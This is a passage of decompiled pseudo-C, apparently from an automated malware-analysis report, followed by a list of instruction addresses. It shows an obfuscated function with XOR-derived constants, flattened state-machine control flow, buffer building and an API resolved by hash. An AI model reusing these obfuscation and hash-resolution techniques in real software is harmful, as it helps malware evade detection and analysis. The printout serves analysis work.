                                                                                                                				signed int _v388;
                                                                                                                				signed int _v392;
                                                                                                                				signed int _v396;
                                                                                                                				signed int _v400;
                                                                                                                				signed int _v404;
                                                                                                                				signed int _v408;
                                                                                                                				signed int _v412;
                                                                                                                				signed int _v416;
                                                                                                                				unsigned int _v420;
                                                                                                                				signed int _v424;
                                                                                                                				signed int _v428;
                                                                                                                				signed int _v432;
                                                                                                                				signed int _v436;
                                                                                                                				signed int _v440;
                                                                                                                				signed int _v444;
                                                                                                                				signed int _v448;
                                                                                                                				signed int _v452;
                                                                                                                				signed int _v456;
                                                                                                                				signed int _v460;
                                                                                                                				signed int _v464;
                                                                                                                				signed int _v468;
                                                                                                                				signed int _v472;
                                                                                                                				signed int _v476;
                                                                                                                				signed int _v480;
                                                                                                                				signed int _v484;
                                                                                                                				signed int _v488;
                                                                                                                				signed int _v492;
                                                                                                                				signed int _v496;
                                                                                                                				signed int _v500;
                                                                                                                				signed int _v504;
                                                                                                                				signed int _v508;
                                                                                                                				signed int _v512;
                                                                                                                				int _v516;
                                                                                                                				signed int _v520;
                                                                                                                				signed int _v524;
                                                                                                                				signed int _v528;
                                                                                                                				signed int _v532;
                                                                                                                				signed int _v536;
                                                                                                                				signed int _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				unsigned int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _v572;
                                                                                                                				signed int _v576;
                                                                                                                				signed int _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _t668;
                                                                                                                				signed int _t675;
                                                                                                                				signed int _t680;
                                                                                                                				int _t687;
                                                                                                                				void* _t689;
                                                                                                                				signed int _t699;
                                                                                                                				void* _t709;
                                                                                                                				void* _t720;
                                                                                                                				signed int _t722;
                                                                                                                				signed int _t723;
                                                                                                                				signed int _t724;
                                                                                                                				signed int _t725;
                                                                                                                				signed int _t728;
                                                                                                                				int _t729;
                                                                                                                				signed int _t734;
                                                                                                                				void* _t776;
                                                                                                                				void* _t778;
                                                                                                                				signed int _t780;
                                                                                                                				signed int _t794;
                                                                                                                				signed int _t795;
                                                                                                                				signed int _t796;
                                                                                                                				signed int _t797;
                                                                                                                				signed int _t798;
                                                                                                                				signed int _t799;
                                                                                                                				signed int _t800;
                                                                                                                				signed int _t801;
                                                                                                                				signed int _t802;
                                                                                                                				void* _t805;
                                                                                                                				void* _t806;
                                                                                                                				void* _t809;
                                                                                                                				void* _t810;
                                                                                                                				signed int _t815;
                                                                                                                				signed int* _t816;
                                                                                                                				signed int* _t817;
                                                                                                                				void* _t822;
                                                                                                                
                                                                                                                				_t729 = __ecx;
                                                                                                                				_t816 =  &_v584;
                                                                                                                				_v296 = _v296 & 0x00000000;
                                                                                                                				_v292 = _v292 & 0x00000000;
                                                                                                                				_v300 = 0xbfc205;
                                                                                                                				_v476 = 0xe06ed5;
                                                                                                                				_v308 = __edx;
                                                                                                                				_t809 = 0x96a71f5;
                                                                                                                				_v516 = __ecx;
                                                                                                                				_t723 = 0x1b;
                                                                                                                				_v476 = _v476 / _t723;
                                                                                                                				_t794 = 0x2e;
                                                                                                                				_v476 = _v476 * 0x3d;
                                                                                                                				_v476 = _v476 ^ 0x01fb0d24;
                                                                                                                				_v532 = 0x7f5025;
                                                                                                                				_v532 = _v532 / _t794;
                                                                                                                				_v532 = _v532 >> 1;
                                                                                                                				_t795 = 0x29;
                                                                                                                				_v532 = _v532 * 0xe;
                                                                                                                				_v532 = _v532 ^ 0x001547bb;
                                                                                                                				_v444 = 0x62972e;
                                                                                                                				_v444 = _v444 * 0x2a;
                                                                                                                				_v444 = _v444 ^ 0x9e8335ea;
                                                                                                                				_v444 = _v444 ^ 0x8ea3a596;
                                                                                                                				_v320 = 0x907f39;
                                                                                                                				_v320 = _v320 + 0x65d0;
                                                                                                                				_v320 = _v320 ^ 0x009943ff;
                                                                                                                				_v428 = 0x60bd2e;
                                                                                                                				_v428 = _v428 | 0x3d23ea16;
                                                                                                                				_v428 = _v428 * 5;
                                                                                                                				_v428 = _v428 ^ 0x32f61b2b;
                                                                                                                				_v404 = 0x4907ee;
                                                                                                                				_v404 = _v404 << 0xc;
                                                                                                                				_v404 = _v404 ^ 0x90780154;
                                                                                                                				_v348 = 0x2e1acf;
                                                                                                                				_v348 = _v348 / _t795;
                                                                                                                				_v348 = _v348 ^ 0x000ff70f;
                                                                                                                				_v436 = 0x97367f;
                                                                                                                				_v436 = _v436 << 0xe;
                                                                                                                				_v436 = _v436 | 0xdb899251;
                                                                                                                				_v436 = _v436 ^ 0xdf9b824b;
                                                                                                                				_v324 = 0xebd6c8;
                                                                                                                				_v324 = _v324 << 0xa;
                                                                                                                				_v324 = _v324 ^ 0xaf5ea9c0;
                                                                                                                				_v520 = 0xd9d8cd;
                                                                                                                				_v520 = _v520 << 0xa;
                                                                                                                				_v520 = _v520 + 0x63ee;
                                                                                                                				_v520 = _v520 << 0xb;
                                                                                                                				_v520 = _v520 ^ 0x1cb3afae;
                                                                                                                				_v560 = 0xaf03fc;
                                                                                                                				_t796 = 0x48;
                                                                                                                				_v560 = _v560 * 0x76;
                                                                                                                				_v560 = _v560 + 0x9549;
                                                                                                                				_v560 = _v560 >> 4;
                                                                                                                				_v560 = _v560 ^ 0x05052227;
                                                                                                                				_v332 = 0x2f3f61;
                                                                                                                				_t96 =  &_v332; // 0x2f3f61
                                                                                                                				_v332 =  *_t96 / _t796;
                                                                                                                				_v332 = _v332 ^ 0x000f8f64;
                                                                                                                				_v464 = 0x9fe00b;
                                                                                                                				_v464 = _v464 + 0xffffee0a;
                                                                                                                				_v464 = _v464 + 0xffff0aae;
                                                                                                                				_v464 = _v464 ^ 0x00902a9c;
                                                                                                                				_v440 = 0xfd1e9;
                                                                                                                				_v440 = _v440 << 0xc;
                                                                                                                				_v440 = _v440 + 0xca64;
                                                                                                                				_v440 = _v440 ^ 0xfd16b483;
                                                                                                                				_v408 = 0xeebb8e;
                                                                                                                				_v408 = _v408 + 0xffff0e73;
                                                                                                                				_v408 = _v408 ^ 0x00ea13e0;
                                                                                                                				_v416 = 0x2dba52;
                                                                                                                				_v416 = _v416 | 0x854157ee;
                                                                                                                				_t797 = 0x15;
                                                                                                                				_v416 = _v416 / _t797;
                                                                                                                				_v416 = _v416 ^ 0x06590104;
                                                                                                                				_v448 = 0x36c229;
                                                                                                                				_v448 = _v448 >> 0xa;
                                                                                                                				_v448 = _v448 << 1;
                                                                                                                				_v448 = _v448 ^ 0x000a2e05;
                                                                                                                				_v556 = 0xbb3701;
                                                                                                                				_v556 = _v556 << 8;
                                                                                                                				_v556 = _v556 + 0xbac0;
                                                                                                                				_v556 = _v556 + 0x70a;
                                                                                                                				_v556 = _v556 ^ 0xbb3e6b1d;
                                                                                                                				_v480 = 0x1fd882;
                                                                                                                				_v480 = _v480 | 0x9ff5afcf;
                                                                                                                				_v480 = _v480 ^ 0x9ff852ab;
                                                                                                                				_v312 = 0xdf641f;
                                                                                                                				_v312 = _v312 << 0xb;
                                                                                                                				_v312 = _v312 ^ 0xfb258884;
                                                                                                                				_v468 = 0x860220;
                                                                                                                				_v468 = _v468 ^ 0x443bea04;
                                                                                                                				_v468 = _v468 + 0x4096;
                                                                                                                				_v468 = _v468 ^ 0x44bbee0e;
                                                                                                                				_v452 = 0x387082;
                                                                                                                				_v452 = _v452 ^ 0xe49c86b4;
                                                                                                                				_v452 = _v452 << 0xb;
                                                                                                                				_v452 = _v452 ^ 0x27bf5aa2;
                                                                                                                				_v540 = 0xe2fd1f;
                                                                                                                				_t798 = 0x65;
                                                                                                                				_v540 = _v540 * 0x35;
                                                                                                                				_v540 = _v540 / _t798;
                                                                                                                				_v540 = _v540 >> 3;
                                                                                                                				_v540 = _v540 ^ 0x00084b4b;
                                                                                                                				_v548 = 0x990f5c;
                                                                                                                				_v548 = _v548 | 0xa6ba7d67;
                                                                                                                				_v548 = _v548 >> 0xb;
                                                                                                                				_v548 = _v548 + 0xd94b;
                                                                                                                				_v548 = _v548 ^ 0x0015945e;
                                                                                                                				_v356 = 0x8758e2;
                                                                                                                				_v356 = _v356 << 3;
                                                                                                                				_v356 = _v356 ^ 0x043eab32;
                                                                                                                				_v392 = 0x104c9;
                                                                                                                				_t799 = 0x53;
                                                                                                                				_v392 = _v392 * 0x65;
                                                                                                                				_v392 = _v392 ^ 0x006a3a77;
                                                                                                                				_v524 = 0xe7875;
                                                                                                                				_v524 = _v524 << 0xd;
                                                                                                                				_v524 = _v524 / _t799;
                                                                                                                				_v524 = _v524 ^ 0xd006acbc;
                                                                                                                				_v524 = _v524 ^ 0xd2701620;
                                                                                                                				_v420 = 0xa2e0e1;
                                                                                                                				_v420 = _v420 + 0x9fac;
                                                                                                                				_v420 = _v420 >> 0xe;
                                                                                                                				_v420 = _v420 ^ 0x000f1802;
                                                                                                                				_v400 = 0x8ad323;
                                                                                                                				_v400 = _v400 + 0xeebf;
                                                                                                                				_v400 = _v400 ^ 0x008d733c;
                                                                                                                				_v568 = 0x33386;
                                                                                                                				_v568 = _v568 << 1;
                                                                                                                				_v568 = _v568 + 0xffff47fe;
                                                                                                                				_v568 = _v568 << 0xd;
                                                                                                                				_v568 = _v568 ^ 0xb5ecfbc7;
                                                                                                                				_v380 = 0x977b1d;
                                                                                                                				_v380 = _v380 + 0x32d2;
                                                                                                                				_v380 = _v380 ^ 0x0096f1e7;
                                                                                                                				_v528 = 0x47cad5;
                                                                                                                				_v528 = _v528 << 0xe;
                                                                                                                				_v528 = _v528 + 0x117b;
                                                                                                                				_v528 = _v528 ^ 0x62a7d64a;
                                                                                                                				_v528 = _v528 ^ 0x901e5ee5;
                                                                                                                				_v496 = 0x989678;
                                                                                                                				_v496 = _v496 >> 5;
                                                                                                                				_v496 = _v496 << 3;
                                                                                                                				_v496 = _v496 + 0xc2e8;
                                                                                                                				_v496 = _v496 ^ 0x002244cf;
                                                                                                                				_v340 = 0x734af;
                                                                                                                				_v340 = _v340 << 5;
                                                                                                                				_v340 = _v340 ^ 0x00e29a83;
                                                                                                                				_v504 = 0x930888;
                                                                                                                				_v504 = _v504 + 0xffff38c8;
                                                                                                                				_v504 = _v504 ^ 0x1b6d5aa4;
                                                                                                                				_v504 = _v504 + 0xffffa587;
                                                                                                                				_v504 = _v504 ^ 0x1bf5a095;
                                                                                                                				_v396 = 0xd3ef1f;
                                                                                                                				_v396 = _v396 ^ 0xd6c5c28a;
                                                                                                                				_v396 = _v396 ^ 0xd619a7a1;
                                                                                                                				_v328 = 0x822f06;
                                                                                                                				_v328 = _v328 >> 5;
                                                                                                                				_v328 = _v328 ^ 0x00008632;
                                                                                                                				_v544 = 0x926971;
                                                                                                                				_v544 = _v544 << 5;
                                                                                                                				_t800 = 0x31;
                                                                                                                				_v544 = _v544 * 0x72;
                                                                                                                				_v544 = _v544 / _t723;
                                                                                                                				_v544 = _v544 ^ 0x01686497;
                                                                                                                				_v488 = 0xf9c7fc;
                                                                                                                				_v488 = _v488 ^ 0x8b4c4a19;
                                                                                                                				_v488 = _v488 + 0xafa5;
                                                                                                                				_v488 = _v488 * 0x11;
                                                                                                                				_v488 = _v488 ^ 0x4718d04f;
                                                                                                                				_v552 = 0x5331df;
                                                                                                                				_v552 = _v552 ^ 0x3a6e8992;
                                                                                                                				_v552 = _v552 + 0x89e;
                                                                                                                				_v552 = _v552 ^ 0xa30a7961;
                                                                                                                				_v552 = _v552 ^ 0x9935c6a2;
                                                                                                                				_v424 = 0x60cb3c;
                                                                                                                				_v424 = _v424 / _t800;
                                                                                                                				_v424 = _v424 ^ 0x94b44812;
                                                                                                                				_v424 = _v424 ^ 0x94bb09ec;
                                                                                                                				_v316 = 0x6cd112;
                                                                                                                				_v316 = _v316 << 6;
                                                                                                                				_v316 = _v316 ^ 0x1b302e24;
                                                                                                                				_v372 = 0x2a5810;
                                                                                                                				_v372 = _v372 ^ 0x38df9cc4;
                                                                                                                				_v372 = _v372 ^ 0x38f32c5d;
                                                                                                                				_v580 = 0x23e95b;
                                                                                                                				_t340 =  &_v580; // 0x23e95b
                                                                                                                				_t801 = 0x35;
                                                                                                                				_v580 =  *_t340 / _t801;
                                                                                                                				_v580 = _v580 | 0xb3a77411;
                                                                                                                				_v580 = _v580 << 0xf;
                                                                                                                				_v580 = _v580 ^ 0xfeb1d9ac;
                                                                                                                				_v432 = 0x2d52ef;
                                                                                                                				_v432 = _v432 ^ 0x89a52be1;
                                                                                                                				_v432 = _v432 + 0xffff4ebe;
                                                                                                                				_v432 = _v432 ^ 0x89880755;
                                                                                                                				_v456 = 0xdc26bf;
                                                                                                                				_t724 = 0x57;
                                                                                                                				_t802 = 0x22;
                                                                                                                				_v456 = _v456 * 0x2c;
                                                                                                                				_v456 = _v456 + 0xffff5828;
                                                                                                                				_v456 = _v456 ^ 0x25d4b754;
                                                                                                                				_v536 = 0xfc08df;
                                                                                                                				_v536 = _v536 << 1;
                                                                                                                				_v536 = _v536 | 0xd2f015b6;
                                                                                                                				_v536 = _v536 >> 9;
                                                                                                                				_v536 = _v536 ^ 0x006c8efe;
                                                                                                                				_v512 = 0x75dda6;
                                                                                                                				_v512 = _v512 + 0xfffffcd0;
                                                                                                                				_v512 = _v512 | 0x47ccbb41;
                                                                                                                				_v512 = _v512 << 0xe;
                                                                                                                				_v512 = _v512 ^ 0x7edb190b;
                                                                                                                				_v564 = 0x5b32c;
                                                                                                                				_v564 = _v564 ^ 0x41a2fb13;
                                                                                                                				_v564 = _v564 << 2;
                                                                                                                				_v564 = _v564 + 0xfffff1de;
                                                                                                                				_v564 = _v564 ^ 0x06993e2b;
                                                                                                                				_v572 = 0xfad927;
                                                                                                                				_v572 = _v572 * 0x62;
                                                                                                                				_v572 = _v572 + 0xffffd5ba;
                                                                                                                				_v572 = _v572 ^ 0xf873c778;
                                                                                                                				_v572 = _v572 ^ 0x98769463;
                                                                                                                				_v364 = 0x6374a4;
                                                                                                                				_v364 = _v364 << 6;
                                                                                                                				_v364 = _v364 ^ 0x18d7b2b4;
                                                                                                                				_v576 = 0x3ef600;
                                                                                                                				_v576 = _v576 + 0xd423;
                                                                                                                				_v576 = _v576 + 0x5df0;
                                                                                                                				_v576 = _v576 * 0x21;
                                                                                                                				_v576 = _v576 ^ 0x08453bb6;
                                                                                                                				_v472 = 0x451dd4;
                                                                                                                				_v472 = _v472 | 0xaf7d5e47;
                                                                                                                				_v472 = _v472 ^ 0x92738145;
                                                                                                                				_v472 = _v472 ^ 0x3d0d5d82;
                                                                                                                				_v460 = 0xe6bf66;
                                                                                                                				_v460 = _v460 + 0xffffe0a2;
                                                                                                                				_v460 = _v460 ^ 0x97a82b84;
                                                                                                                				_v460 = _v460 ^ 0x974a4531;
                                                                                                                				_v388 = 0x46f3ef;
                                                                                                                				_v388 = _v388 >> 0xc;
                                                                                                                				_v388 = _v388 ^ 0x00030886;
                                                                                                                				_v492 = 0xbc30fc;
                                                                                                                				_v492 = _v492 << 0xa;
                                                                                                                				_v492 = _v492 / _t724;
                                                                                                                				_v492 = _v492 | 0xb72a338e;
                                                                                                                				_v492 = _v492 ^ 0xb7e5d98e;
                                                                                                                				_v384 = 0x1702e;
                                                                                                                				_v384 = _v384 + 0x2706;
                                                                                                                				_v384 = _v384 ^ 0x0009cd6f;
                                                                                                                				_v360 = 0x550257;
                                                                                                                				_v360 = _v360 / _t802;
                                                                                                                				_v360 = _v360 ^ 0x000d5f65;
                                                                                                                				_v484 = 0xadea32;
                                                                                                                				_v484 = _v484 | 0xa1ef876a;
                                                                                                                				_v484 = _v484 << 5;
                                                                                                                				_v484 = _v484 << 4;
                                                                                                                				_v484 = _v484 ^ 0xdfdc1026;
                                                                                                                				_v368 = 0x134ce0;
                                                                                                                				_v368 = _v368 | 0x42671b26;
                                                                                                                				_v368 = _v368 ^ 0x4275121b;
                                                                                                                				_v376 = 0x80ed5f;
                                                                                                                				_v376 = _v376 + 0xffff791c;
                                                                                                                				_v376 = _v376 ^ 0x00851c71;
                                                                                                                				_v336 = 0x4f5593;
                                                                                                                				_v336 = _v336 >> 8;
                                                                                                                				_v336 = _v336 ^ 0x0005bc59;
                                                                                                                				_v344 = 0xd76f47;
                                                                                                                				_v344 = _v344 >> 9;
                                                                                                                				_v344 = _v344 ^ 0x000aa1ac;
                                                                                                                				_v352 = 0x4edb6;
                                                                                                                				_v352 = _v352 ^ 0x164bcf03;
                                                                                                                				_v352 = _v352 ^ 0x1640f4de;
                                                                                                                				_v412 = 0x444772;
                                                                                                                				_v412 = _v412 + 0x8eef;
                                                                                                                				_v412 = _v412 + 0xb28b;
                                                                                                                				_v412 = _v412 ^ 0x0042f1f5;
                                                                                                                				_v500 = 0x3e0859;
                                                                                                                				_v500 = _v500 | 0x2dbaaf7f;
                                                                                                                				_t725 = _v308;
                                                                                                                				_t815 = _v308;
                                                                                                                				_v500 = _v500 / _t724;
                                                                                                                				_v500 = _v500 >> 0xc;
                                                                                                                				_v500 = _v500 ^ 0x0001a163;
                                                                                                                				_v508 = 0x8dceaa;
                                                                                                                				_v508 = _v508 << 0xe;
                                                                                                                				_v508 = _v508 + 0x6716;
                                                                                                                				_v508 = _v508 | 0x0a3c7300;
                                                                                                                				_v508 = _v508 ^ 0x7bb5de47;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					while(1) {
                                                                                                                						_t776 = 0xf385ccd;
                                                                                                                						do {
                                                                                                                							while(1) {
                                                                                                                								L3:
                                                                                                                								_t822 = _t809 - 0xa9d75f4;
                                                                                                                								if(_t822 > 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								if(_t822 == 0) {
                                                                                                                									_t805 = _t805 +  *((intOrPtr*)(_t729 + 4));
                                                                                                                									_push(_t729);
                                                                                                                									_t699 = E001A303A(_t729, _t805);
                                                                                                                									_t729 = _v516;
                                                                                                                									_t815 = _t699;
                                                                                                                									_t675 = _v584;
                                                                                                                									_t816 =  &(_t816[3]);
                                                                                                                									__eflags = _t815;
                                                                                                                									_t776 = 0xf385ccd;
                                                                                                                									_t809 =  !=  ? 0xf385ccd : 0x1bee950;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								if(_t809 == 0x627224) {
                                                                                                                									_push(0x10);
                                                                                                                									_t805 = E001B96D4(_t729, 4);
                                                                                                                									E001A8744(_v332, _v464, 0xb, _v440, _t805,  &_v128, _v408);
                                                                                                                									_t816 =  &(_t816[8]);
                                                                                                                									_t809 = 0xd9ae7f4;
                                                                                                                									L12:
                                                                                                                									_t675 = _v584;
                                                                                                                									L13:
                                                                                                                									_t729 = _v516;
                                                                                                                									_t776 = 0xf385ccd;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								if(_t809 == 0x776a43) {
                                                                                                                									E001BFD42( *((intOrPtr*)(_t729 + 4)), _v472,  *_t729, _v460, _t725, _v388);
                                                                                                                									_t729 = _v516;
                                                                                                                									_t816 =  &(_t816[4]);
                                                                                                                									_t809 = 0xf4a0b72;
                                                                                                                									_t725 = _t725 +  *((intOrPtr*)(_t729 + 4));
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								if(_t809 == 0x1bee950) {
                                                                                                                									E001B17D2(_v500, _v508, _t675);
                                                                                                                									return 0;
                                                                                                                								}
                                                                                                                								if(_t809 == 0x48355a4) {
                                                                                                                									_push(_v496);
                                                                                                                									_push(0x1a1790);
                                                                                                                									_push(_v528);
                                                                                                                									_t709 = E001BF5D9(_v568, _v380, __eflags);
                                                                                                                									_push( &_v256);
                                                                                                                									_push(_t709);
                                                                                                                									_push(_t805);
                                                                                                                									_push(_v584);
                                                                                                                									 *((intOrPtr*)(E001AADB7(_v568, 0x9f864bbe, 0x270)))();
                                                                                                                									E001BF94B(_t709, _v340, _v504, _v396, _v328);
                                                                                                                									_t816 =  &(_t816[0xa]);
                                                                                                                									_t809 = 0xa9d75f4;
                                                                                                                									goto L12;
                                                                                                                								}
                                                                                                                								if(_t809 != 0x96a71f5) {
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								_t809 = 0xbcae4d8;
                                                                                                                							}
                                                                                                                							__eflags = _t809 - 0xb3e9bbf;
                                                                                                                							if(_t809 == 0xb3e9bbf) {
                                                                                                                								_push(0x4000);
                                                                                                                								_t668 = E001A303A(0x4000, 0x4000);
                                                                                                                								_t816 =  &(_t816[3]);
                                                                                                                								_v584 = _t668;
                                                                                                                								__eflags = _t668;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t729 = _v516;
                                                                                                                									_t809 = 0x619244d;
                                                                                                                									_t776 = 0xf385ccd;
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								_t809 = 0x48355a4;
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							__eflags = _t809 - 0xbcae4d8;
                                                                                                                							if(_t809 == 0xbcae4d8) {
                                                                                                                								_push(8);
                                                                                                                								_t805 = E001B96D4(_t729, 1);
                                                                                                                								E001A8744(_v428, _v404, 9, _v348, _t805,  &_v288, _v436);
                                                                                                                								_t816 =  &(_t816[8]);
                                                                                                                								_t809 = 0x627224;
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							__eflags = _t809 - 0xd9ae7f4;
                                                                                                                							if(_t809 == 0xd9ae7f4) {
                                                                                                                								_t810 =  &_v256;
                                                                                                                								_push(0x10);
                                                                                                                								_t778 = E001B96D4(_t729, 8);
                                                                                                                								_t817 =  &(_t816[3]);
                                                                                                                								_t680 = _v476;
                                                                                                                								__eflags = _t680 - _t778;
                                                                                                                								if(_t680 < _t778) {
                                                                                                                									_t780 = _t778 - _t680;
                                                                                                                									_t806 = _t810;
                                                                                                                									_t734 = _t780 >> 1;
                                                                                                                									__eflags = _t734;
                                                                                                                									_t687 = memset(_t806, 0x2d002d, _t734 << 2);
                                                                                                                									asm("adc ecx, ecx");
                                                                                                                									_t810 = _t810 + _t780 * 2;
                                                                                                                									memset(_t806 + _t734, _t687, 0);
                                                                                                                									_t817 =  &(_t817[6]);
                                                                                                                									_t729 = 0;
                                                                                                                								}
                                                                                                                								_push(0x10);
                                                                                                                								_t805 = E001B96D4(_t729, 8);
                                                                                                                								E001A8744(_v452, _v540, 0xb, _v548, _t805, _t810, _v356);
                                                                                                                								_t816 =  &(_t817[8]);
                                                                                                                								_t809 = 0xb3e9bbf;
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							__eflags = _t809 - _t776;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_push(_v372);
                                                                                                                								_v304 = _t805 + _t815;
                                                                                                                								_t689 = E001AE4F5(_v316, 0x1a17e0, __eflags);
                                                                                                                								_t725 = E001AD360(_t805 + _t815 - _t815, __eflags, _v580,  &_v128,  &_v256, _v432, _t815, _v456,  &_v288, _v536, _v512) + _t815;
                                                                                                                								E001BF94B(_t689, _v564, _v572, _v364, _v576);
                                                                                                                								_t816 =  &(_t816[0xd]);
                                                                                                                								_t809 = 0x776a43;
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							__eflags = _t809 - 0xf4a0b72;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L33;
                                                                                                                							}
                                                                                                                							_push(_v384);
                                                                                                                							_t720 = E001AEC15(_v484, __eflags, _v368, _v376, E001AE4F5(_v492, 0x1a1710, __eflags), _v304 - _t725,  &_v256, _t725);
                                                                                                                							E001BF94B(_t716, _v336, _v344, _v352, _v412);
                                                                                                                							_t722 = _v308;
                                                                                                                							_t728 = _t725 + _t720 - _t815;
                                                                                                                							__eflags = _t728;
                                                                                                                							 *_t722 = _t815;
                                                                                                                							 *(_t722 + 4) = _t728;
                                                                                                                							L23:
                                                                                                                							return _v584;
                                                                                                                							L33:
                                                                                                                							__eflags = _t809 - 0x619244d;
                                                                                                                						} while (__eflags != 0);
                                                                                                                						goto L23;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x001b53c2
                                                                                                                0x001b53cd
                                                                                                                0x001b53d8
                                                                                                                0x001b53e3
                                                                                                                0x001b53ee
                                                                                                                0x001b53f6
                                                                                                                0x001b5401
                                                                                                                0x001b540c
                                                                                                                0x001b5417
                                                                                                                0x001b5422
                                                                                                                0x001b542d
                                                                                                                0x001b5438
                                                                                                                0x001b544c
                                                                                                                0x001b5451
                                                                                                                0x001b545a
                                                                                                                0x001b5465
                                                                                                                0x001b5470
                                                                                                                0x001b5478
                                                                                                                0x001b547f
                                                                                                                0x001b548a
                                                                                                                0x001b5492
                                                                                                                0x001b5497
                                                                                                                0x001b549f
                                                                                                                0x001b54a7
                                                                                                                0x001b54af
                                                                                                                0x001b54b7
                                                                                                                0x001b54bf
                                                                                                                0x001b54c7
                                                                                                                0x001b54d2
                                                                                                                0x001b54da
                                                                                                                0x001b54e5
                                                                                                                0x001b54f0
                                                                                                                0x001b54fb
                                                                                                                0x001b5506
                                                                                                                0x001b5511
                                                                                                                0x001b551c
                                                                                                                0x001b5527
                                                                                                                0x001b552f
                                                                                                                0x001b553a
                                                                                                                0x001b5547
                                                                                                                0x001b554a
                                                                                                                0x001b5556
                                                                                                                0x001b555a
                                                                                                                0x001b555f
                                                                                                                0x001b5567
                                                                                                                0x001b556f
                                                                                                                0x001b5577
                                                                                                                0x001b557c
                                                                                                                0x001b5584
                                                                                                                0x001b558c
                                                                                                                0x001b5597
                                                                                                                0x001b559f
                                                                                                                0x001b55aa
                                                                                                                0x001b55bd
                                                                                                                0x001b55be
                                                                                                                0x001b55c5
                                                                                                                0x001b55d0
                                                                                                                0x001b55d8
                                                                                                                0x001b55e3
                                                                                                                0x001b55e7
                                                                                                                0x001b55ef
                                                                                                                0x001b55f7
                                                                                                                0x001b5602
                                                                                                                0x001b560d
                                                                                                                0x001b5615
                                                                                                                0x001b5620
                                                                                                                0x001b562b
                                                                                                                0x001b5638
                                                                                                                0x001b5643
                                                                                                                0x001b564b
                                                                                                                0x001b564f
                                                                                                                0x001b5657
                                                                                                                0x001b565c
                                                                                                                0x001b5664
                                                                                                                0x001b566f
                                                                                                                0x001b567a
                                                                                                                0x001b5685
                                                                                                                0x001b568d
                                                                                                                0x001b5692
                                                                                                                0x001b569a
                                                                                                                0x001b56a2
                                                                                                                0x001b56aa
                                                                                                                0x001b56b2
                                                                                                                0x001b56b7
                                                                                                                0x001b56bc
                                                                                                                0x001b56c4
                                                                                                                0x001b56cc
                                                                                                                0x001b56d7
                                                                                                                0x001b56df
                                                                                                                0x001b56ea
                                                                                                                0x001b56f2
                                                                                                                0x001b56fa
                                                                                                                0x001b5702
                                                                                                                0x001b570a
                                                                                                                0x001b5712
                                                                                                                0x001b571d
                                                                                                                0x001b5728
                                                                                                                0x001b5733
                                                                                                                0x001b573e
                                                                                                                0x001b5746
                                                                                                                0x001b5751
                                                                                                                0x001b5759
                                                                                                                0x001b5765
                                                                                                                0x001b5768
                                                                                                                0x001b5774
                                                                                                                0x001b5778
                                                                                                                0x001b5780
                                                                                                                0x001b5788
                                                                                                                0x001b5790
                                                                                                                0x001b579d
                                                                                                                0x001b57a1
                                                                                                                0x001b57a9
                                                                                                                0x001b57b1
                                                                                                                0x001b57b9
                                                                                                                0x001b57c1
                                                                                                                0x001b57c9
                                                                                                                0x001b57d1
                                                                                                                0x001b57e7
                                                                                                                0x001b57ee
                                                                                                                0x001b57f9
                                                                                                                0x001b5804
                                                                                                                0x001b580f
                                                                                                                0x001b5817
                                                                                                                0x001b5822
                                                                                                                0x001b582d
                                                                                                                0x001b5838
                                                                                                                0x001b5843
                                                                                                                0x001b584b
                                                                                                                0x001b584f
                                                                                                                0x001b5852
                                                                                                                0x001b5856
                                                                                                                0x001b585e
                                                                                                                0x001b5863
                                                                                                                0x001b586b
                                                                                                                0x001b5876
                                                                                                                0x001b5881
                                                                                                                0x001b588e
                                                                                                                0x001b5899
                                                                                                                0x001b58ae
                                                                                                                0x001b58b1
                                                                                                                0x001b58b2
                                                                                                                0x001b58b9
                                                                                                                0x001b58c4
                                                                                                                0x001b58cf
                                                                                                                0x001b58d7
                                                                                                                0x001b58db
                                                                                                                0x001b58e3
                                                                                                                0x001b58e8
                                                                                                                0x001b58f0
                                                                                                                0x001b58f8
                                                                                                                0x001b5900
                                                                                                                0x001b5908
                                                                                                                0x001b590d
                                                                                                                0x001b5915
                                                                                                                0x001b591d
                                                                                                                0x001b5925
                                                                                                                0x001b592a
                                                                                                                0x001b5932
                                                                                                                0x001b593a
                                                                                                                0x001b5947
                                                                                                                0x001b594b
                                                                                                                0x001b5953
                                                                                                                0x001b595b
                                                                                                                0x001b5963
                                                                                                                0x001b596e
                                                                                                                0x001b5976
                                                                                                                0x001b5981
                                                                                                                0x001b5989
                                                                                                                0x001b5991
                                                                                                                0x001b599e
                                                                                                                0x001b59a2
                                                                                                                0x001b59aa
                                                                                                                0x001b59b5
                                                                                                                0x001b59c0
                                                                                                                0x001b59cb
                                                                                                                0x001b59d6
                                                                                                                0x001b59e1
                                                                                                                0x001b59ec
                                                                                                                0x001b59f7
                                                                                                                0x001b5a02
                                                                                                                0x001b5a0d
                                                                                                                0x001b5a15
                                                                                                                0x001b5a20
                                                                                                                0x001b5a28
                                                                                                                0x001b5a35
                                                                                                                0x001b5a39
                                                                                                                0x001b5a41
                                                                                                                0x001b5a49
                                                                                                                0x001b5a54
                                                                                                                0x001b5a5f
                                                                                                                0x001b5a6a
                                                                                                                0x001b5a7e
                                                                                                                0x001b5a85
                                                                                                                0x001b5a90
                                                                                                                0x001b5a98
                                                                                                                0x001b5aa0
                                                                                                                0x001b5aa5
                                                                                                                0x001b5aaa
                                                                                                                0x001b5ab2
                                                                                                                0x001b5abd
                                                                                                                0x001b5ac8
                                                                                                                0x001b5ad3
                                                                                                                0x001b5ade
